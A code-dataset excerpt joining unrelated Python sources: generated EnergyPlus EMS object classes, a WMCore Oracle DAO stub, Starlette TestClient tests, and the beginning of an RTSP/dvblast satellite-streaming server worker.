    def ems_variable_name(self):
        """field `EMS Variable Name`

        | must be an acceptable EMS variable, no spaces

        Args:
            value (str): value for IDD Field `EMS Variable Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `ems_variable_name` or None if not set

        """
        return self["EMS Variable Name"]

    @ems_variable_name.setter
    def ems_variable_name(self, value=None):
        """Corresponds to IDD field `EMS Variable Name`"""
        self["EMS Variable Name"] = value

    @property
    def update_frequency(self):
        """field `Update Frequency`

        Args:
            value (str): value for IDD Field `Update Frequency`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `update_frequency` or None if not set

        """
        return self["Update Frequency"]

    @update_frequency.setter
    def update_frequency(self, value=None):
        """Corresponds to IDD field `Update Frequency`"""
        self["Update Frequency"] = value

    @property
    def ems_program_or_subroutine_name(self):
        """field `EMS Program or Subroutine Name`

        | optional for global scope variables, required for local scope variables

        Args:
            value (str): value for IDD Field `EMS Program or Subroutine Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `ems_program_or_subroutine_name` or None if not set

        """
        return self["EMS Program or Subroutine Name"]

    @ems_program_or_subroutine_name.setter
    def ems_program_or_subroutine_name(self, value=None):
        """Corresponds to IDD field `EMS Program or Subroutine Name`"""
        self["EMS Program or Subroutine Name"] = value

    @property
    def resource_type(self):
        """field `Resource Type`

        | choose the type of fuel, water, electricity, pollution or heat rate that should be metered.

        Args:
            value (str): value for IDD Field `Resource Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `resource_type` or None if not set

        """
        return self["Resource Type"]

    @resource_type.setter
    def resource_type(self, value=None):
        """Corresponds to IDD field `Resource Type`"""
        self["Resource Type"] = value

    @property
    def group_type(self):
        """field `Group Type`

        | choose a general classification, building (internal services), HVAC (air systems), or plant (hydronic systems), or system

        Args:
            value (str): value for IDD Field `Group Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `group_type` or None if not set

        """
        return self["Group Type"]

    @group_type.setter
    def group_type(self, value=None):
        """Corresponds to IDD field `Group Type`"""
        self["Group Type"] = value

    @property
    def enduse_category(self):
        """field `End-Use Category`

        | choose how the metered output should be classified for end-use category

        Args:
            value (str): value for IDD Field `End-Use Category`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `enduse_category` or None if not set

        """
        return self["End-Use Category"]

    @enduse_category.setter
    def enduse_category(self, value=None):
        """ Corresponds to IDD field `End-Use Category`
        """
        self["End-Use Category"] = value

    @property
    def enduse_subcategory(self):
        """field `End-Use Subcategory`

        | enter a user-defined subcategory for this metered output

        Args:
            value (str): value for IDD Field `End-Use Subcategory`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `enduse_subcategory` or None if not set

        """
        return self["End-Use Subcategory"]

    @enduse_subcategory.setter
    def enduse_subcategory(self, value=None):
        """ Corresponds to IDD field `End-Use Subcategory`
        """
        self["End-Use Subcategory"] = value

    @property
    def units(self):
        """field `Units`

        | optional but will result in dimensionless units for blank
        | EnergyPlus units are standard SI units

        Args:
            value (str): value for IDD Field `Units`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `units` or None if not set

        """
        return self["Units"]

    @units.setter
    def units(self, value=None):
        """Corresponds to IDD field `Units`"""
        self["Units"] = value
class EnergyManagementSystemTrendVariable(DataObject):

    """ Corresponds to IDD object `EnergyManagementSystem:TrendVariable`
        This object sets up an EMS trend variable from an Erl variable
        A trend variable logs values across timesteps
    """
    # IDD metadata consumed by the DataObject base class: field names,
    # ordering, types and validation constraints for this object.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'ems variable name',
                                       {'name': u'EMS Variable Name',
                                        'pyname': u'ems_variable_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'number of timesteps to be logged',
                                       {'name': u'Number of Timesteps to be Logged',
                                        'pyname': u'number_of_timesteps_to_be_logged',
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 1,
                                        'autocalculatable': False,
                                        'type': u'integer'})]),
               'format': None,
               'group': u'Energy Management System',
               'min-fields': 3,
               'name': u'EnergyManagementSystem:TrendVariable',
               'pyname': u'EnergyManagementSystemTrendVariable',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        | no spaces allowed in name

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def ems_variable_name(self):
        """field `EMS Variable Name`

        | must be a global scope EMS variable

        Args:
            value (str): value for IDD Field `EMS Variable Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `ems_variable_name` or None if not set

        """
        return self["EMS Variable Name"]

    @ems_variable_name.setter
    def ems_variable_name(self, value=None):
        """Corresponds to IDD field `EMS Variable Name`"""
        self["EMS Variable Name"] = value

    @property
    def number_of_timesteps_to_be_logged(self):
        """field `Number of Timesteps to be Logged`

        | value >= 1

        Args:
            value (int): value for IDD Field `Number of Timesteps to be Logged`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            int: the value of `number_of_timesteps_to_be_logged` or None if not set

        """
        return self["Number of Timesteps to be Logged"]

    @number_of_timesteps_to_be_logged.setter
    def number_of_timesteps_to_be_logged(self, value=None):
        """Corresponds to IDD field `Number of Timesteps to be Logged`"""
        self["Number of Timesteps to be Logged"] = value
class EnergyManagementSystemInternalVariable(DataObject):

    """ Corresponds to IDD object `EnergyManagementSystem:InternalVariable`
        Declares EMS variable as an internal data variable
    """
    # IDD metadata consumed by the DataObject base class: field names,
    # ordering, types and validation constraints for this object.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'internal data index key name',
                                       {'name': u'Internal Data Index Key Name',
                                        'pyname': u'internal_data_index_key_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'internal data type',
                                       {'name': u'Internal Data Type',
                                        'pyname': u'internal_data_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'})]),
               'format': None,
               'group': u'Energy Management System',
               'min-fields': 3,
               'name': u'EnergyManagementSystem:InternalVariable',
               'pyname': u'EnergyManagementSystemInternalVariable',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        | This name becomes a variable for use in Erl programs
        | no spaces allowed in name

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def internal_data_index_key_name(self):
        """field `Internal Data Index Key Name`

        Args:
            value (str): value for IDD Field `Internal Data Index Key Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `internal_data_index_key_name` or None if not set

        """
        return self["Internal Data Index Key Name"]

    @internal_data_index_key_name.setter
    def internal_data_index_key_name(self, value=None):
        """Corresponds to IDD field `Internal Data Index Key Name`"""
        self["Internal Data Index Key Name"] = value

    @property
    def internal_data_type(self):
        """field `Internal Data Type`

        Args:
            value (str): value for IDD Field `Internal Data Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `internal_data_type` or None if not set

        """
        return self["Internal Data Type"]

    @internal_data_type.setter
    def internal_data_type(self, value=None):
        """Corresponds to IDD field `Internal Data Type`"""
        self["Internal Data Type"] = value
class EnergyManagementSystemCurveOrTableIndexVariable(DataObject):

    """Corresponds to IDD object `EnergyManagementSystem:CurveOrTableIndexVariable`.

    Declares an EMS variable that identifies a curve or table.
    """

    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'}),
            (u'curve or table object name',
             {'name': u'Curve or Table Object Name',
              'pyname': u'curve_or_table_object_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'})]),
        'format': None,
        'group': u'Energy Management System',
        'min-fields': 2,
        'name': u'EnergyManagementSystem:CurveOrTableIndexVariable',
        'pyname': u'EnergyManagementSystemCurveOrTableIndexVariable',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """Get IDD field `Name`.

        This name becomes a variable usable in Erl programs; no spaces allowed.

        Returns:
            str: the stored value, or None if not set.
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`."""
        self["Name"] = value

    @property
    def curve_or_table_object_name(self):
        """Get IDD field `Curve or Table Object Name`.

        Returns:
            str: the stored value, or None if not set.
        """
        return self["Curve or Table Object Name"]

    @curve_or_table_object_name.setter
    def curve_or_table_object_name(self, value=None):
        """Set IDD field `Curve or Table Object Name`."""
        self["Curve or Table Object Name"] = value
class EnergyManagementSystemConstructionIndexVariable(DataObject):

    """Corresponds to IDD object `EnergyManagementSystem:ConstructionIndexVariable`.

    Declares an EMS variable that identifies a construction.
    """

    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'}),
            (u'construction object name',
             {'name': u'Construction Object Name',
              'pyname': u'construction_object_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'})]),
        'format': None,
        'group': u'Energy Management System',
        'min-fields': 2,
        'name': u'EnergyManagementSystem:ConstructionIndexVariable',
        'pyname': u'EnergyManagementSystemConstructionIndexVariable',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """Get IDD field `Name`.

        This name becomes a variable usable in Erl programs; no spaces allowed.

        Returns:
            str: the stored value, or None if not set.
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`."""
        self["Name"] = value

    @property
    def construction_object_name(self):
        """Get IDD field `Construction Object Name`.

        Returns:
            str: the stored value, or None if not set.
        """
        return self["Construction Object Name"]

    @construction_object_name.setter
    def construction_object_name(self, value=None):
        """Set IDD field `Construction Object Name`."""
        self["Construction Object Name"] = value
class EnergyManagementSystemProgram(DataObject):

    """Corresponds to IDD object `EnergyManagementSystem:Program`.

    Defines an Erl program; each field after the name holds one line of
    EMS Runtime Language.
    """

    _schema = {
        'extensible-fields': OrderedDict([
            (u'program line 1',
             {'name': u'Program Line 1',
              'pyname': u'program_line_1',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'})]),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'})]),
        'format': None,
        'group': u'Energy Management System',
        'min-fields': 2,
        'name': u'EnergyManagementSystem:Program',
        'pyname': u'EnergyManagementSystemProgram',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """Get IDD field `Name` (no spaces allowed).

        Returns:
            str: the stored value, or None if not set.
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`."""
        self["Name"] = value

    def add_extensible(self, program_line_1=None):
        """Append one extensible record (a single program line).

        Args:
            program_line_1 (str): value for IDD Field `Program Line 1`.
                None is recorded as a missing value without validation.
        """
        checked = self.check_value("Program Line 1", program_line_1)
        self._extdata.append([checked])

    @property
    def extensibles(self):
        """Return the nested list of all extensible records."""
        return self._extdata

    @extensibles.setter
    def extensibles(self, extensibles):
        """Replace all extensible records with `extensibles` (nested list)."""
        self._extdata = []
        for record in extensibles:
            self.add_extensible(*record)
class EnergyManagementSystemSubroutine(DataObject):

    """Corresponds to IDD object `EnergyManagementSystem:Subroutine`.

    Defines an Erl program subroutine; each field after the name holds one
    line of EMS Runtime Language.
    """

    _schema = {
        'extensible-fields': OrderedDict([
            (u'program line',
             {'name': u'Program Line',
              'pyname': u'program_line',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'})]),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'})]),
        'format': None,
        'group': u'Energy Management System',
        'min-fields': 2,
        'name': u'EnergyManagementSystem:Subroutine',
        'pyname': u'EnergyManagementSystemSubroutine',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """Get IDD field `Name` (no spaces allowed).

        Returns:
            str: the stored value, or None if not set.
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`."""
        self["Name"] = value

    def add_extensible(self, program_line=None):
        """Append one extensible record (a single program line).

        Args:
            program_line (str): value for IDD Field `Program Line`.
                None is recorded as a missing value without validation.
        """
        checked = self.check_value("Program Line", program_line)
        self._extdata.append([checked])

    @property
    def extensibles(self):
        """Return the nested list of all extensible records."""
        return self._extdata

    @extensibles.setter
    def extensibles(self, extensibles):
        """Replace all extensible records with `extensibles` (nested list)."""
        self._extdata = []
        for record in extensibles:
            self.add_extensible(*record)
class EnergyManagementSystemGlobalVariable(DataObject):

    """Corresponds to IDD object `EnergyManagementSystem:GlobalVariable`.

    Declares Erl variables as having global scope.
    No spaces are allowed in names used for Erl variables.
    """

    _schema = {
        'extensible-fields': OrderedDict([
            (u'erl variable 1 name',
             {'name': u'Erl Variable 1 Name',
              'pyname': u'erl_variable_1_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'})]),
        'fields': OrderedDict(),
        'format': None,
        'group': u'Energy Management System',
        'min-fields': 1,
        'name': u'EnergyManagementSystem:GlobalVariable',
        'pyname': u'EnergyManagementSystemGlobalVariable',
        'required-object': False,
        'unique-object': False}

    def add_extensible(self, erl_variable_1_name=None):
        """Append one extensible record (a single Erl variable name).

        Args:
            erl_variable_1_name (str): value for IDD Field `Erl Variable 1 Name`.
                None is recorded as a missing value without validation.
        """
        checked = self.check_value("Erl Variable 1 Name", erl_variable_1_name)
        self._extdata.append([checked])

    @property
    def extensibles(self):
        """Return the nested list of all extensible records."""
        return self._extdata

    @extensibles.setter
    def extensibles(self, extensibles):
        """Replace all extensible records with `extensibles` (nested list)."""
        self._extdata = []
        for record in extensibles:
            self.add_extensible(*record)
| StarcoderdataPython |
3281238 | #!/usr/bin/env python
"""
_SetBlockFiles_
Oracle implementation of DBS3Buffer.SetBlockFiles
"""
from WMComponent.DBS3Buffer.MySQL.SetBlockFiles import SetBlockFiles as MySQLSetBlockFiles
class SetBlockFiles(MySQLSetBlockFiles):
    """Oracle implementation of DBS3Buffer.SetBlockFiles.

    Inherits everything from the MySQL version unchanged — presumably the
    MySQL SQL is dialect-compatible with Oracle, so no overrides are needed.
    """
| StarcoderdataPython |
1737816 | import anyio
import pytest
from starlette.applications import Starlette
from starlette.middleware import Middleware
from starlette.responses import JSONResponse
from starlette.testclient import TestClient
from starlette.websockets import WebSocket, WebSocketDisconnect
mock_service = Starlette()


@mock_service.route("/")
def mock_service_endpoint(request):
    """Endpoint of the mocked-out service; always returns a fixed JSON body."""
    payload = {"mock": "example"}
    return JSONResponse(payload)
app = Starlette()


@app.route("/")
def homepage(request):
    """Call the mock service through a nested TestClient and relay its JSON."""
    inner_client = TestClient(mock_service)
    mock_response = inner_client.get("/")
    return JSONResponse(mock_response.json())
startup_error_app = Starlette()


@startup_error_app.on_event("startup")
def startup():
    """Startup hook that always fails, used to test startup error propagation."""
    raise RuntimeError()
def test_use_testclient_in_endpoint():
    """The test client must be usable from inside an application endpoint.

    This is useful for mocking out other services during tests or in
    development.
    """
    outer_client = TestClient(app)
    body = outer_client.get("/").json()
    assert body == {"mock": "example"}
def test_use_testclient_as_contextmanager():
    """Entering/exiting TestClient as a context manager must not raise."""
    client = TestClient(app)
    with client:
        pass
def test_error_on_startup():
    """A failing startup hook must surface when entering the client context."""
    with pytest.raises(RuntimeError):
        with TestClient(startup_error_app):
            pass  # pragma: no cover
def test_exception_in_middleware():
    """An exception raised inside middleware must propagate out of the client."""

    class MiddlewareException(Exception):
        pass

    class BrokenMiddleware:
        def __init__(self, app):
            self.app = app

        async def __call__(self, scope, receive, send):
            raise MiddlewareException()

    broken_app = Starlette(middleware=[Middleware(BrokenMiddleware)])
    with pytest.raises(MiddlewareException):
        with TestClient(broken_app):
            pass  # pragma: no cover
def test_testclient_asgi2():
    """An ASGI 2.0 (double-callable) application should work with TestClient."""

    def asgi2_app(scope):
        async def instance(receive, send):
            start_message = {
                "type": "http.response.start",
                "status": 200,
                "headers": [[b"content-type", b"text/plain"]],
            }
            await send(start_message)
            await send({"type": "http.response.body", "body": b"Hello, world!"})

        return instance

    response = TestClient(asgi2_app).get("/")
    assert response.text == "Hello, world!"
def test_testclient_asgi3():
    """An ASGI 3.0 (single-callable) application should work with TestClient."""

    async def asgi3_app(scope, receive, send):
        start_message = {
            "type": "http.response.start",
            "status": 200,
            "headers": [[b"content-type", b"text/plain"]],
        }
        await send(start_message)
        await send({"type": "http.response.body", "body": b"Hello, world!"})

    response = TestClient(asgi3_app).get("/")
    assert response.text == "Hello, world!"
def test_websocket_blocking_receive():
    """A pending (blocking) receive must not stop a sibling task from sending."""

    def app(scope):
        # Sends one JSON message to the client; runs concurrently with the
        # blocked receive in `asgi` below.
        async def respond(websocket):
            await websocket.send_json({"message": "test"})

        async def asgi(receive, send):
            websocket = WebSocket(scope, receive=receive, send=send)
            await websocket.accept()
            async with anyio.create_task_group() as task_group:
                task_group.start_soon(respond, websocket)
                try:
                    # this will block as the client does not send us data
                    # it should not prevent `respond` from executing though
                    await websocket.receive_json()
                except WebSocketDisconnect:
                    pass

        return asgi

    client = TestClient(app)
    with client.websocket_connect("/") as websocket:
        # The message sent by `respond` must arrive even while the server-side
        # receive_json() is still blocked.
        data = websocket.receive_json()
        assert data == {"message": "test"}
| StarcoderdataPython |
1736971 | #!/usr/bin/python
import sys, traceback, threading, socket, signal, re, commands, os, time, string, random, uuid
from random import randint
from resources import getFrontEnds
from netInterfaceStatus import getServerIP
from scanning import getChList
from subprocess import Popen, PIPE
# global session
# global dvblastReload
# NOTE(review): `global` statements at module scope are no-ops; the lines
# below only document which names the worker threads treat as shared state.
global clientsDict
global chList
global frontEndsDict
global freqDict
global firstBootFlag
global fLog
# Init global variables (one copy per server process, shared across workers)
clientsDict = {} # e.g. clientsDict = { 'ip_client_1': {'rtpPort': '', state: 0, 'satFreq': '', stream: 0, 'src': '', 'pol': '', 'ro': '', 'msys': '', 'mtype': '', 'plts': '', 'sr': '', 'fec': '', 'status': 'sendonly', 'owner': True, 'session': '' }}
freqDict = {} # e.g. freqDict = {'freq': 'adapter0'} -- maps a tuned frequency to the adapter serving it
frontEndsDict = {} # e.g. frontEndsDict = {'adapter0': {'owner': '0.0.0.0', 'freq': '', 'numOwners': 0}}
chList = {} # e.g. chList = {'satFreq': ['freq', 'pid']} -- overwritten by getChList() just below
# session = '' # For THEARDOWN reply
# dvblastReload = False # e.g. Flag to trigger a reload
firstBootFlag = True # First bootup of the device
# Build the channel list once at import time (refreshed again in rtspServerWorker.run)
chList = getChList()
# Truncate the worker log so each run starts with a clean file
f = open('logs/rtspServerWorker.log', 'w')
f.close()
class rtspServerWorker:
    """Per-client RTSP worker: parses RTSP requests and drives dvblast to
    stream the requested frequency (SAT>IP style front-end).
    """

    # RTSP request types (events) this worker recognises.
    SETUP = 'SETUP'
    PLAY = 'PLAY'
    TEARDOWN = 'TEARDOWN'
    OPTIONS = 'OPTIONS'
    DESCRIBE = 'DESCRIBE'
    CLOSE_CONNETION = 'CLOSE_CONNETION'  # NOTE(review): typo for CONNECTION; kept as-is for compatibility
    # Per-client session states (stored in clientsDict[ip]['state']).
    INI = 0
    READY = 1
    PLAYING = 2
    # Reply codes passed to replyRtsp() -- meaning inferred from names; confirm in replyRtsp.
    OK_200_OPTIONS = 0
    FILE_NOT_FOUND_404 = 1
    CON_ERR_500 = 2
    CLOSING_CONNECTION = 3
    OK_404_DESCRIBE = 4
    OK_200_DESCRIBE = 5
    OK_200_DESCRIBE_NOSIGNAL = 6
    OK_200_SETUP = 7
    OK_200_SETUP_PIDS = 8
    OK_200_PLAY = 9
    OK_200_TEARDOWN = 10
    # Loop flag for recvRtspRequest; cleared on the instance by run() on shutdown.
    SERVER_RUNNING = 1
    # Class-level default; __init__ replaces it with the real per-client dict.
    clientInfo = {}
def __init__(self, clientInfo):
global clientsDict
rtpPort = ''
state = 0
stream = 0
src = ''
freq = ''
pol = ''
ro = ''
msys = ''
mtype = ''
plts = ''
sr = ''
fec = ''
status = 'inactive'
ownerCapabilties = True # Owner capabilties flag, in order to know if we can increase the number of owners of a tuner or not. If false that means that we are coowners, otherwise we are the only owner of a tuner or did not requested any at all.
session = ''
dvblastReload = False # DvblastReload flag, in order to know if we need to reload
self.clientInfo = clientInfo
if self.clientInfo['addr_IP'] not in clientsDict:
clientsDict[self.clientInfo['addr_IP']] = {}
clientsDict[self.clientInfo['addr_IP']]['rtpPort'] = rtpPort
clientsDict[self.clientInfo['addr_IP']]['state'] = state
clientsDict[self.clientInfo['addr_IP']]['stream'] = stream
clientsDict[self.clientInfo['addr_IP']]['src'] = src
clientsDict[self.clientInfo['addr_IP']]['freq'] = freq
clientsDict[self.clientInfo['addr_IP']]['pol'] = pol
clientsDict[self.clientInfo['addr_IP']]['ro'] = ro
clientsDict[self.clientInfo['addr_IP']]['msys'] = msys
clientsDict[self.clientInfo['addr_IP']]['mtype'] = mtype
clientsDict[self.clientInfo['addr_IP']]['plts'] = plts
clientsDict[self.clientInfo['addr_IP']]['sr'] = sr
clientsDict[self.clientInfo['addr_IP']]['fec'] = fec
clientsDict[self.clientInfo['addr_IP']]['status'] = status
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = ownerCapabilties
clientsDict[self.clientInfo['addr_IP']]['session'] = session
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = dvblastReload
def run(self):
global chList
chList = getChList()
t = threading.Thread(target=self.recvRtspRequest)
t.daemon = True
t.start()
try:
while t.is_alive():
t.join(timeout=1.0)
except (KeyboardInterrupt, SystemExit):
# fLog.close()
self.SERVER_RUNNING = 0
def recvRtspRequest(self):
"""Receive RTSP request from the client."""
connSocket = self.clientInfo['rtspSocket']
while self.SERVER_RUNNING:
data = connSocket.recv(1024)
if data:
self.processRtspRequest(data)
def processRtspRequest(self, data):
"""Process RTSP request sent from the client."""
# global session
# global dvblastReload
global chList
global clientsDict
global frontEndsDict
global freqDict
global firstBootFlag
global fLog
# Initialize local variables
freq = ''
pids = ''
delPids = 0
delPid = 0
fLog = open('logs/rtspServerWorker.log', 'a')
# Get the request type
request = data.split('\n')
line1 = request[0].split(' ')
requestType = line1[0]
# Get the last part of the URI
uriLastPart = line1[1]
# Get the RTSP sequence number
for seq_find in request[1:]:
# Word parsing for general URI request seq/client_port
match_seq = re.search(r'CSeq', seq_find)
if match_seq:
# To do check the output
seq = seq_find.split(':')
match_client_port = re.search(r'client_port', seq_find)
if match_client_port:
seq_find_array = seq_find.split(';')
self.clientInfo['rtpPort']= seq_find_array[2].split('=')[1].split('-')[0]
clientsDict[self.clientInfo['addr_IP']]['rtpPort'] = self.clientInfo['rtpPort']
# Word parsing for SETUP/PLAY URI request
if requestType == self.SETUP or requestType == self.PLAY:
match_pids = re.search(r'pids=([\w]+)', uriLastPart)
if match_pids:
pids = match_pids.group(1)
match_delpids = re.search(r'delpids=([\w]+)', uriLastPart)
if match_delpids:
delPids = 1
delPid = int(match_delpids.group(1))
# Process SETUP request
if requestType == self.SETUP:
# Word parsing for SETUP URI request
match_src = re.search(r'src=([\w]+)', uriLastPart)
if match_src:
clientsDict[self.clientInfo['addr_IP']]['src'] = match_src.group(1)
match_freq = re.search(r'freq=([\w]+)', uriLastPart)
if match_freq:
freq = match_freq.group(1)
clientsDict[self.clientInfo['addr_IP']]['freq'] = freq
match_pol = re.search(r'pol=([\w]+)', uriLastPart)
if match_pol:
clientsDict[self.clientInfo['addr_IP']]['pol'] = match_pol.group(1)
match_ro = re.search(r'ro=([\w]+...)', uriLastPart)
if match_ro:
clientsDict[self.clientInfo['addr_IP']]['ro'] = match_ro.group(1)
match_msys = re.search(r'msys=([\w]+)', uriLastPart)
if match_msys:
clientsDict[self.clientInfo['addr_IP']]['msys'] = match_msys.group(1)
match_mtype = re.search(r'mtype=([\w]+)', uriLastPart)
if match_mtype:
clientsDict[self.clientInfo['addr_IP']]['mtype'] = match_mtype.group(1)
match_plts = re.search(r'plts=([\w]+)', uriLastPart)
if match_plts:
clientsDict[self.clientInfo['addr_IP']]['plts'] = match_plts.group(1)
match_sr = re.search(r'sr=([\w]+)', uriLastPart)
if match_sr:
clientsDict[self.clientInfo['addr_IP']]['sr'] = match_sr.group(1)
match_fec = re.search(r'fec=([\w]+)', uriLastPart)
if match_fec:
clientsDict[self.clientInfo['addr_IP']]['fec'] = match_fec.group(1)
clientsDict[self.clientInfo['addr_IP']]['status'] = 'sendonly'
# Process SETUP request If STATE is INI
if clientsDict[self.clientInfo['addr_IP']]['state'] == self.INI:
fLog.write("Info rtspServerWorker: Processing SETUP, New State: READY\n")
clientsDict[self.clientInfo['addr_IP']]['state'] = self.READY
# Generate a randomized RTSP session ID
clientsDict[self.clientInfo['addr_IP']]['session'] = uuid.uuid4().hex[:16]
# Increment streamID for every new session
clientsDict[self.clientInfo['addr_IP']]['stream'] = (clientsDict[self.clientInfo['addr_IP']]['stream'] + 1) % 65536
# Send RTSP reply
if freq in chList:
f = open('dvb-t/pid' + chList[freq][0] + '.cfg', 'a')
f.write(self.clientInfo['addr_IP'] + ':' + clientsDict[self.clientInfo['addr_IP']]['rtpPort'] + '\t1\t' + chList[freq][1] + '\n')
f.close()
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = True
if pids == 'none' or pids == '':
self.replyRtsp(self.OK_200_SETUP, seq[1])
if pids == 'none':
clientsDict[self.clientInfo['addr_IP']]['status'] = 'inactive'
else:
self.replyRtsp(self.OK_200_SETUP_PIDS, seq[1])
# Process SETUP request If STATE is READY
elif clientsDict[self.clientInfo['addr_IP']]['state'] == self.READY:
fLog.write("Info rtspServerWorker: Processing SETUP, State: READY\n")
# Send RTSP reply
self.replyRtsp(self.OK_200_SETUP, seq[1])
# Process SETUP request If STATE is PLAYING
elif clientsDict[self.clientInfo['addr_IP']]['state'] == self.PLAYING:
fLog.write("Info rtspServerWorker: Processing SETUP, State: PLAYING\n")
if freq in chList:
f = open('dvb-t/pid' + chList[freq][0] + '.cfg', 'r')
lines = f.readlines()
f.close()
f = open('dvb-t/pid' + chList[freq][0] + '.cfg', 'w')
lineToCompare = self.clientInfo['addr_IP']
for line in lines:
match_line = re.search(lineToCompare, line)
if not match_line:
f.write(line)
f.write(self.clientInfo['addr_IP'] + ':' + clientsDict[self.clientInfo['addr_IP']]['rtpPort'] + '\t1\t' + chList[freq][1] + '\n')
f.close()
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = True
self.replyRtsp(self.OK_200_SETUP, seq[1])
# Process PLAY request
elif requestType == self.PLAY:
# Get available frontends
frontEndsDict = getFrontEnds(frontEndsDict)
if clientsDict[self.clientInfo['addr_IP']]['state'] == self.PLAYING or clientsDict[self.clientInfo['addr_IP']]['state'] == self.READY:
# Send response after processing and starting dvblast
if clientsDict[self.clientInfo['addr_IP']]['state'] == self.READY:
fLog.write("Info rtspServerWorker: Processing PLAY, New State: PLAYING\n")
clientsDict[self.clientInfo['addr_IP']]['state'] = self.PLAYING
else:
# print "Info rtspServerWorker: Processing PLAY, State: PLAYING\n"
fLog.write("Info rtspServerWorker: Processing PLAY, State: PLAYING\n")
self.replyRtsp(self.OK_200_PLAY, seq[1])
# START/RELOAD configuration for dvblast only if we have a streamID, the configuration file has been update and the PLAY URI is not a delete pid
if clientsDict[self.clientInfo['addr_IP']]['stream'] and clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] and delPids == 0:
# If firstBootFlag is true this means that no frontend has been configured, so stop wasting time with searching for particular frontends
if firstBootFlag:
firstBootFlag = False
for frontEnd in frontEndsDict:
if frontEndsDict[frontEnd]['freq'] == '':
# Start dvblast on specified freq
cmd = 'dvblast -a ' + frontEnd[-1] + ' -c dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg -f ' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + ' -b 8 -C -u -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + frontEnd + '.sock'
fLog.write('Info rtspServerWorker: Starting dvblast 1\n')
self.run_dvblast(cmd)
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = False
frontEndsDict[frontEnd]['freq'] = chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]
frontEndsDict[frontEnd]['owner'] = self.clientInfo['addr_IP']
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owners
freqDict[frontEndsDict[frontEnd]['freq']] = frontEnd
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = True
# print " frontEndsDict0", frontEndsDict
break
# No more first boot, the search for available and preconfigured/unconfigured frontends
